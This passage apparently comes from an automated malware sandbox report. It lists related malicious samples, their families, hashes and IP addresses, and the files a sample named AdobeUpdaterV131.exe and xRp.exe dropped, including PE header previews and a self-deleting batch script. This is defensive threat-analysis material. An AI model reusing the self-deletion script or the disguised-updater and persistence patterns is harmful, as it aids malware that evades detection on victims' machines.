	aac8519abeba00e182d4447ac6ccabd3887f0900c6d9ee86ba76326beb673b16.exe	Get hash	malicious	Bdaejec, SmokeLoader	Browse	44.221.84.105
	ab6712bb5295b323b59cc12c08375b22667a0d0fe8d724750c3d98f9d92e7280.exe	Get hash	malicious	Bdaejec	Browse	44.221.84.105
	A61D991D01857B94696C896E5F0A9B5A5537D7F7BDFA342551F88FC6C865D3AD.exe	Get hash	malicious	Bdaejec, RedLine	Browse	44.221.84.105
	A6B1DC8EA546B26E5A6F2D13DE10E4C20D6CE9774348E5BD75388E91DE689AC1.exe	Get hash	malicious	Babuk, Bdaejec, Djvu	Browse	44.221.84.105
	A63B9C4ED6D83AFF1BF47215F3297D5FB1CD85E69A24DEAC6750D511F61DE055.exe	Get hash	malicious	Bdaejec, SmokeLoader	Browse	44.221.84.105
	a405d01674721b014e2cb23e544e12c49fa27c7cc90e896b437ad813dbe440fb.exe	Get hash	malicious	Bdaejec	Browse	44.221.84.105
FREE-NET-ASFREEnetEU	installer.exe	Get hash	malicious	LummaC, PureLog Stealer, Xmrig, zgRAT	Browse	147.45.47.81
	92.249.48.47-skid.arm7-2024-07-20T09_04_19.elf	Get hash	malicious	Mirai, Moobot	Browse	147.45.93.156
	conhost.exe	Get hash	malicious	Xmrig	Browse	147.45.47.81
	http://premium.davidabostic.com	Get hash	malicious	Unknown	Browse	147.45.78.74
	Software1.30.1.exe	Get hash	malicious	RedLine, Xmrig	Browse	147.45.47.81
	arm7.elf	Get hash	malicious	Mirai	Browse	147.45.45.222
	SecuriteInfo.com.Win32.RATX-gen.28387.25625.exe	Get hash	malicious	PureLog Stealer	Browse	193.233.203.218
	SecuriteInfo.com.Win32.RATX-gen.28387.25625.exe	Get hash	malicious	PureLog Stealer, zgRAT	Browse	193.233.203.218
	https://jswebcloud.com	Get hash	malicious	Unknown	Browse	147.45.78.74
	https://premium.davidabostic.com	Get hash	malicious	Unknown	Browse	147.45.78.74

JA3 Fingerprints

⊘No context

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Users\user\AppData\Local\Temp\xRp.exe	AF94EC40248120D040629B0B921538DB88886FB9534A7A167D06D2B6EF5DA784.exe	Get hash	malicious	Bdaejec, SmokeLoader	Browse
	AIBIJIAO 12.exe	Get hash	malicious	Bdaejec	Browse
	ACACF499B033BA6707F458366D563E7682E8E856A313EF8446C7CCEC41AD3F82.exe	Get hash	malicious	Bdaejec, RedLine	Browse
	AB3BFACF38D1544DCEACFE2ECD4DC8501182979913ADBC56402E874E6D53A315.exe	Get hash	malicious	Babuk, Bdaejec, Djvu	Browse
	aac8519abeba00e182d4447ac6ccabd3887f0900c6d9ee86ba76326beb673b16.exe	Get hash	malicious	Bdaejec, SmokeLoader	Browse
	ab6712bb5295b323b59cc12c08375b22667a0d0fe8d724750c3d98f9d92e7280.exe	Get hash	malicious	Bdaejec	Browse
	7Y18r(224).exe	Get hash	malicious	Bdaejec	Browse
	A61D991D01857B94696C896E5F0A9B5A5537D7F7BDFA342551F88FC6C865D3AD.exe	Get hash	malicious	Bdaejec, RedLine	Browse
	A6B1DC8EA546B26E5A6F2D13DE10E4C20D6CE9774348E5BD75388E91DE689AC1.exe	Get hash	malicious	Babuk, Bdaejec, Djvu	Browse
	A63B9C4ED6D83AFF1BF47215F3297D5FB1CD85E69A24DEAC6750D511F61DE055.exe	Get hash	malicious	Bdaejec, SmokeLoader	Browse

Created / dropped Files

C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\xRp.exe
File Type:	MS-DOS executable PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	19456
Entropy (8bit):	6.591411463821307
Encrypted:	false
SSDEEP:	384:1FqSTXZQaD7U8iu4YsAa7ZA0UvH2lsRv21yW7GbAxur6+Y9PffPz:bNQGPL4vzZq2o9W7GsxBbPr
MD5:	B4BF7F8D489E0DE938987E026D2E8436
SHA1:	FB2C2C141E60B33DBB4FFA5F2F96C1DD357087DE
SHA-256:	B4CE1CAD5BE1FD43F14329BC26B687B281045961431BFEA2D5B0CF5718BAA66B
SHA-512:	96BE63F3ACD4B1C814AD0BA04781C6F8CD5855C0A0ACC0E6707580409AB03631BA1FE630BF441FB789B3A264D10DF3E7338EE3F00451C9929F338F2D4A62F655
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	low
Preview:	MZ..........................................................@...PE..L....................................0............................................................................................... ..l...........................................................................................................PELIB...............................`....rsrc........ ......................@..@..Y\|.uR..P...0...B.................. ...................................................................................j.h"...h....j...(....Hello World!.MyProg........................................................................................................................................................................................................................(...........0...(.......................;.......User32.dll...MessageBoxA................................................................................................dummy.exe.....................TestExport.CallPlz................

C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\xRp.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2389504
Entropy (8bit):	6.731348551534886
Encrypted:	false
SSDEEP:	49152:BGSXoV72tpV9XE8Wwi1aCvYMdRluS/fYw44RxL:V4OEtwiICvYMpf
MD5:	4F1A3411233274894B2999C28CE14A10
SHA1:	CC8AB1616ACD5F14532236FF4615E29CF52268BF
SHA-256:	FE619629371658FEAB5E59B3CE22E9509CC4F311F0C49851853686E417BF4FB7
SHA-512:	98A2AEC5D4065CC3B925C067F6D019F32121B7648CD647D99CC1EBF5C9177DBAB98DB5FDBAAC9E77CFF49B554D162D8FACEB26E63236AF056845CC1E08094046
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........Ark.Ark.Ark...o.Mrk...h.Jrk...n.^rk...j.Erk.H...Brk.H...nrk.Arj..pk...b.rk...k.@rk.....@rk...i.@rk.RichArk.........................PE..L.....(c.....................~.......p$...........@...........................$...........@.........................p...<............@ ......................P#.....@...p...................P...........@............................................text...e........................... ..`.rdata...^.......`..................@..@.data...`....0......................@....rsrc........@ ....... .............@..@.reloc.......P#......"#.............@..B.....u...P...p$..B...4$............. ...........................................................................................................................................................................................................................................................

C:\Program Files\7-Zip\Uninstall.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\xRp.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	31744
Entropy (8bit):	6.36664593232107
Encrypted:	false
SSDEEP:	768:uWQ3655Kv1X/qY1MSdUGQGPL4vzZq2o9W7GsxBbPr:uHqaNrFdUdGCq2iW7z
MD5:	EC0D55ED19B8ADB7BC0BEB7F54AFA442
SHA1:	E6D188D048B2ADF30E9817740F3790AA9D13038F
SHA-256:	5111B800FAB76BF2BB4349AA0065F06D353AC1672826CD43542A104648A8E307
SHA-512:	E7731F2D7AFA787B352E5CFF308FE81CA8D554F8CEA4454B6B368E4D553E78B0EDD1AB73AF55229D44F016087AD78D99F9B38D2E7D51BAAE87D95D2301D4316D
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......S.6...X...X...X.x.R...X..V...X.x.\...X......X...Y.W.X......X.!.R...X...^...X.Rich..X.................PE..L...pN.d........../......V...@.......p.......0....@.........................................................................$9.......`...............................................................................0...............................text............................... ..`.rdata.......0......................@..@.data...X....@.......(..............@....rsrc........`.......*..............@..@.EpN.uZ..P...p...B...:.............. ...................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\MPGPH131\MPGPH131.exe

Download File

Process:	C:\Users\user\Desktop\AdobeUpdaterV131.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2342912
Entropy (8bit):	7.956902857826616
Encrypted:	false
SSDEEP:	49152:31Ev2MLvP7P2ECifSC5oPo/wf/5FUzuJpzzX2iFEQaKmULewa:32DvTP2PiLds/5KzGn9WQFSwa
MD5:	0BFB030DCBF461F2C76087E4B9856836
SHA1:	75425A8DC79A21373520A241A7C51D9A1CE7E91A
SHA-256:	BDB5F42B5E4709134A4F963B9648AF4F8E19E2011937F72FF3B75488887E3F14
SHA-512:	618971540126EF2759BD98E1DF88C2460A5D180994E5E709289889BDCB877E02C34859AC07051BF1E6C158FF5D51F58D1E9E49A44759762AA959854671F67F50
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......C.........L.....L.....L.....H.G...H.....H.....H...R.L.....L.....L...............E.....-........Rich..........PE..L......e...............".....V........Z...........@..........................PZ...........@.................................W...k....`...C.......................................................................................................... . .P..........................@....rsrc....C...`......................@....idata ............................@... ..+.........................@...czumqxku.P...p?..J..................@...oiivdxoz......Y......X#.............@....taggant.0....Y.."...\#.............@.....u...P....Z..B...~#............. ...........................................................................................................................................................

C:\ProgramData\MPGPH131\MPGPH131.exe:Zone.Identifier

Download File

Process:	C:\Users\user\Desktop\AdobeUpdaterV131.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Preview:	[ZoneTransfer]....ZoneId=0

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_xRp.exe_7882c768d6c31dccd748b5c295fd1acde18b92a0_315f04a9_21d8cb95-f6f1-4f8d-abf3-a62910f17152\Report.wer

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	1.0754025759754307
Encrypted:	false
SSDEEP:	96:rib8F/mfbrVsfhnt7afzQXIDcQCc6KkcEXcw3N+HbHg/1AnQECaVDPCoLnNfoU+3:dEfbrVq08rtujICBpOtzuiF0Z24IO8N
MD5:	CAED3DD1817C731DE1FCDFB62908D16B
SHA1:	FC1C4798FA4D46D93DDD8C755674F9DD7BFDAC9A
SHA-256:	BD01B3BDFF63013A65F24BBDD90B6189D275225589C8B057B51D5835A1A3EF39
SHA-512:	876681B470290A8C0B7AEB1661253AB543ABFF49F0DCCFAEAEA364304C9B9CA7F54D1EC477298A9AC0B842731D2BBDFD322CE53E9A3543756CEBA21D3FCE308B
Malicious:	false
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.6.6.3.2.8.5.1.9.0.3.6.0.8.8.0.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.6.6.3.2.8.5.1.9.9.2.6.7.0.3.7.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.2.1.d.8.c.b.9.5.-.f.6.f.1.-.4.f.8.d.-.a.b.f.3.-.a.6.2.9.1.0.f.1.7.1.5.2.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.3.6.f.5.5.5.a.d.-.1.8.2.c.-.4.1.6.3.-.b.9.8.8.-.5.e.7.b.7.8.2.c.7.9.d.4.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.x.R.p...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.9.a.8.-.0.0.0.1.-.0.0.1.4.-.5.5.8.f.-.a.f.b.5.0.c.d.e.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.7.6.8.9.e.5.5.5.3.1.c.2.7.f.e.9.9.c.6.b.9.2.4.8.4.f.6.9.3.d.0.0.0.0.0.0.f.f.f.f.!.0.0.0.0.d.4.e.9.e.f.1.0.d.7.6.8.5.d.4.9.1.5.8.3.c.6.f.a.9.3.a.e.5.d.9.1.0.5.d.8.1.5.b.d.!.x.R.p...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.1.3././.1.1././.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER3632.tmp.dmp

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 15 streams, Wed Jul 24 21:01:59 2024, 0x1205a4 type
Category:	dropped
Size (bytes):	165350
Entropy (8bit):	1.9187217692269503
Encrypted:	false
SSDEEP:	384:EhL07bH9A/curaL354oLT/18tXH1mtAd2Ff5yJU61xAThAy3OYSYyMMDUi3M:sQn9Az+z5XndOXktJCJA9YYSJMcM
MD5:	0C0BC083D687B555F8E5393D86885B93
SHA1:	9EA5722CBEB3A9F633A3E9612ACB9F945C4CC75D
SHA-256:	1DD1DC0BF944222F1E257ED248BBD461387A477E3E812B05AD4468966B6D18F0
SHA-512:	4A66074728501B80C4869C6CA363EF7B4370DFE1A2FF70F6EA465CC6EE3678B9F5F667E2E3C1BE770F561F5EFE533E25481692BB1CC642433CD3CF12EEA6FC71
Malicious:	false
Preview:	MDMP..a..... ........k.f............t.......................$....'......d....Y..........`.......8...........T............B...C..........8'..........$)..............................................................................eJ.......)......GenuineIntel............T............k.f.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WER37BA.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	8270
Entropy (8bit):	3.699032888137261
Encrypted:	false
SSDEEP:	192:R6l7wVeJ+26s6Y13Q6e3tjpgmfGIpDj89bxgsf1bm:R6lXJ/6s6Yi6ugmfGhxzfU
MD5:	11ECF30D07BF1131EE257B59A22541FB
SHA1:	6136BFEBDF32D01DB0C797FEBAFA3D811F69B447
SHA-256:	A31D826AAE80AFC3EA10AA1B0AA071DC9D777D9C5A491B0C51C19108DE56D696
SHA-512:	1D8621E5E4259F004CB25558EE087CA79A0D2FB68FE3D5961CF61FE0ED8F68570AD3E77BDE41173CC8F7D6AAEE083EDD4326DD082E2A6B3DB7E1190923712293
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.5.6.8.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER37FA.tmp.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4530
Entropy (8bit):	4.43776551631157
Encrypted:	false
SSDEEP:	48:cvIwWl8zssJg77aI925WpW8VY/vYm8M4J8VFe3P+q8wMc4g5Vd:uIjfqI7II7VMyJz/b4g5Vd
MD5:	4B6C8372CEC13A50FA5E40F9BD0EBC5E
SHA1:	D322D9D079286DA9F2F4440DD0607A7C93098FED
SHA-256:	ED275317E5A29B4E371C814E949322C99256EED3B59D61F817314F9896D6BAA5
SHA-512:	A9AE6010E1CB610C19376E82326BA8890E04A1E0B0186D35C3D49EA1654DA54FF4CD2B2F0FA14841CBAA768BAB44631F8CA3EB5D8ACEB89C6646A2A9B0D12BEB
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="425524" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\k1[1].rar

Download File

Process:	C:\Users\user\AppData\Local\Temp\xRp.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	4
Entropy (8bit):	1.5
Encrypted:	false
SSDEEP:	3:Nv:9
MD5:	D3B07384D113EDEC49EAA6238AD5FF00
SHA1:	F1D2D2F924E986AC86FDF7B36C94BCDF32BEEC15
SHA-256:	B5BB9D8014A0F9B1D61E21E796D78DCCDF1352F23CD32812F4850B878AE4944C
SHA-512:	0CF9180A764ABA863A67B6D72F0918BC131C6772642CB2DCE5A34F0A702F9470DDC2BF125C12198B1995C233C34B4AFD346C54A2334C350A948A51B6E8B4E6B6
Malicious:	false
Preview:	foo.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\k1[2].rar

Download File

Process:	C:\Users\user\AppData\Local\Temp\xRp.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	4
Entropy (8bit):	1.5
Encrypted:	false
SSDEEP:	3:Nv:9
MD5:	D3B07384D113EDEC49EAA6238AD5FF00
SHA1:	F1D2D2F924E986AC86FDF7B36C94BCDF32BEEC15
SHA-256:	B5BB9D8014A0F9B1D61E21E796D78DCCDF1352F23CD32812F4850B878AE4944C
SHA-512:	0CF9180A764ABA863A67B6D72F0918BC131C6772642CB2DCE5A34F0A702F9470DDC2BF125C12198B1995C233C34B4AFD346C54A2334C350A948A51B6E8B4E6B6
Malicious:	false
Preview:	foo.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\k2[1].rar

Download File

Process:	C:\Users\user\AppData\Local\Temp\xRp.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	4
Entropy (8bit):	1.5
Encrypted:	false
SSDEEP:	3:Nv:9
MD5:	D3B07384D113EDEC49EAA6238AD5FF00
SHA1:	F1D2D2F924E986AC86FDF7B36C94BCDF32BEEC15
SHA-256:	B5BB9D8014A0F9B1D61E21E796D78DCCDF1352F23CD32812F4850B878AE4944C
SHA-512:	0CF9180A764ABA863A67B6D72F0918BC131C6772642CB2DCE5A34F0A702F9470DDC2BF125C12198B1995C233C34B4AFD346C54A2334C350A948A51B6E8B4E6B6
Malicious:	false
Preview:	foo.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\k2[2].rar

Download File

Process:	C:\Users\user\AppData\Local\Temp\xRp.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	4
Entropy (8bit):	1.5
Encrypted:	false
SSDEEP:	3:Nv:9
MD5:	D3B07384D113EDEC49EAA6238AD5FF00
SHA1:	F1D2D2F924E986AC86FDF7B36C94BCDF32BEEC15
SHA-256:	B5BB9D8014A0F9B1D61E21E796D78DCCDF1352F23CD32812F4850B878AE4944C
SHA-512:	0CF9180A764ABA863A67B6D72F0918BC131C6772642CB2DCE5A34F0A702F9470DDC2BF125C12198B1995C233C34B4AFD346C54A2334C350A948A51B6E8B4E6B6
Malicious:	false
Preview:	foo.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\k3[1].rar

Download File

Process:	C:\Users\user\AppData\Local\Temp\xRp.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	4
Entropy (8bit):	1.5
Encrypted:	false
SSDEEP:	3:Nv:9
MD5:	D3B07384D113EDEC49EAA6238AD5FF00
SHA1:	F1D2D2F924E986AC86FDF7B36C94BCDF32BEEC15
SHA-256:	B5BB9D8014A0F9B1D61E21E796D78DCCDF1352F23CD32812F4850B878AE4944C
SHA-512:	0CF9180A764ABA863A67B6D72F0918BC131C6772642CB2DCE5A34F0A702F9470DDC2BF125C12198B1995C233C34B4AFD346C54A2334C350A948A51B6E8B4E6B6
Malicious:	false
Preview:	foo.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\k4[1].rar

Download File

Process:	C:\Users\user\AppData\Local\Temp\xRp.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	4
Entropy (8bit):	1.5
Encrypted:	false
SSDEEP:	3:Nv:9
MD5:	D3B07384D113EDEC49EAA6238AD5FF00
SHA1:	F1D2D2F924E986AC86FDF7B36C94BCDF32BEEC15
SHA-256:	B5BB9D8014A0F9B1D61E21E796D78DCCDF1352F23CD32812F4850B878AE4944C
SHA-512:	0CF9180A764ABA863A67B6D72F0918BC131C6772642CB2DCE5A34F0A702F9470DDC2BF125C12198B1995C233C34B4AFD346C54A2334C350A948A51B6E8B4E6B6
Malicious:	false
Preview:	foo.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\k5[1].rar

Download File

Process:	C:\Users\user\AppData\Local\Temp\xRp.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	4
Entropy (8bit):	1.5
Encrypted:	false
SSDEEP:	3:Nv:9
MD5:	D3B07384D113EDEC49EAA6238AD5FF00
SHA1:	F1D2D2F924E986AC86FDF7B36C94BCDF32BEEC15
SHA-256:	B5BB9D8014A0F9B1D61E21E796D78DCCDF1352F23CD32812F4850B878AE4944C
SHA-512:	0CF9180A764ABA863A67B6D72F0918BC131C6772642CB2DCE5A34F0A702F9470DDC2BF125C12198B1995C233C34B4AFD346C54A2334C350A948A51B6E8B4E6B6
Malicious:	false
Preview:	foo.

C:\Users\user\AppData\Local\RageMP131\RageMP131.exe

Download File

Process:	C:\Users\user\Desktop\AdobeUpdaterV131.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2342912
Entropy (8bit):	7.956902857826616
Encrypted:	false
SSDEEP:	49152:31Ev2MLvP7P2ECifSC5oPo/wf/5FUzuJpzzX2iFEQaKmULewa:32DvTP2PiLds/5KzGn9WQFSwa
MD5:	0BFB030DCBF461F2C76087E4B9856836
SHA1:	75425A8DC79A21373520A241A7C51D9A1CE7E91A
SHA-256:	BDB5F42B5E4709134A4F963B9648AF4F8E19E2011937F72FF3B75488887E3F14
SHA-512:	618971540126EF2759BD98E1DF88C2460A5D180994E5E709289889BDCB877E02C34859AC07051BF1E6C158FF5D51F58D1E9E49A44759762AA959854671F67F50
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......C.........L.....L.....L.....H.G...H.....H.....H...R.L.....L.....L...............E.....-........Rich..........PE..L......e...............".....V........Z...........@..........................PZ...........@.................................W...k....`...C.......................................................................................................... . .P..........................@....rsrc....C...`......................@....idata ............................@... ..+.........................@...czumqxku.P...p?..J..................@...oiivdxoz......Y......X#.............@....taggant.0....Y.."...\#.............@.....u...P....Z..B...~#............. ...........................................................................................................................................................

C:\Users\user\AppData\Local\RageMP131\RageMP131.exe:Zone.Identifier

Download File

Process:	C:\Users\user\Desktop\AdobeUpdaterV131.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Preview:	[ZoneTransfer]....ZoneId=0

C:\Users\user\AppData\Local\Temp\0be11806.bat

Download File

Process:	C:\Users\user\AppData\Local\Temp\xRp.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	181
Entropy (8bit):	4.885447685885741
Encrypted:	false
SSDEEP:	3:jdKZOt+kiE2J5xAI4bMD2Ut+kiE2J5xAI41KReJsjIdKZOt+kiE2J5xAIgzn:jdKowkn23f4bMD2Uwkn23f41/dKowknl
MD5:	80FDEC7E8861E6F821E435F038F3004A
SHA1:	36B8B06AA9FF5474F2ED0F3440367CD82A015AD4
SHA-256:	B2C2E6F5CCE475453BC666099E014975B129580CC06EA26272BC67877D333C12
SHA-512:	609DE06C428B4F1B410DB2E9BC1199A7D32F6D497622F932A19F30B794F63E07159B2C333F642690C5315E474A016F3725A4802270366CAC82A82B13EAD689D9
Malicious:	false
Preview:	:DELFILE..del "C:\Users\user\AppData\Local\Temp\xRp.exe"..if exist "C:\Users\user\AppData\Local\Temp\xRp.exe" goto :DELFILE..del "C:\Users\user\AppData\Local\Temp\0be11806.bat"..

C:\Users\user\AppData\Local\Temp\20336E8A.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\xRp.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	4
Entropy (8bit):	1.5
Encrypted:	false
SSDEEP:	3:Nv:9
MD5:	D3B07384D113EDEC49EAA6238AD5FF00
SHA1:	F1D2D2F924E986AC86FDF7B36C94BCDF32BEEC15
SHA-256:	B5BB9D8014A0F9B1D61E21E796D78DCCDF1352F23CD32812F4850B878AE4944C
SHA-512:	0CF9180A764ABA863A67B6D72F0918BC131C6772642CB2DCE5A34F0A702F9470DDC2BF125C12198B1995C233C34B4AFD346C54A2334C350A948A51B6E8B4E6B6
Malicious:	false
Preview:	foo.

C:\Users\user\AppData\Local\Temp\31A724C6.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\xRp.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	4
Entropy (8bit):	1.5
Encrypted:	false
SSDEEP:	3:Nv:9
MD5:	D3B07384D113EDEC49EAA6238AD5FF00
SHA1:	F1D2D2F924E986AC86FDF7B36C94BCDF32BEEC15
SHA-256:	B5BB9D8014A0F9B1D61E21E796D78DCCDF1352F23CD32812F4850B878AE4944C
SHA-512:	0CF9180A764ABA863A67B6D72F0918BC131C6772642CB2DCE5A34F0A702F9470DDC2BF125C12198B1995C233C34B4AFD346C54A2334C350A948A51B6E8B4E6B6
Malicious:	false
Preview:	foo.

C:\Users\user\AppData\Local\Temp\32335A13.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\xRp.exe
File Type:	ASCII text
Category:	modified
Size (bytes):	4
Entropy (8bit):	1.5
Encrypted:	false
SSDEEP:	3:Nv:9
MD5:	D3B07384D113EDEC49EAA6238AD5FF00
SHA1:	F1D2D2F924E986AC86FDF7B36C94BCDF32BEEC15
SHA-256:	B5BB9D8014A0F9B1D61E21E796D78DCCDF1352F23CD32812F4850B878AE4944C
SHA-512:	0CF9180A764ABA863A67B6D72F0918BC131C6772642CB2DCE5A34F0A702F9470DDC2BF125C12198B1995C233C34B4AFD346C54A2334C350A948A51B6E8B4E6B6
Malicious:	false
Preview:	foo.

C:\Users\user\AppData\Local\Temp\36C52F46.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\xRp.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	4
Entropy (8bit):	1.5
Encrypted:	false
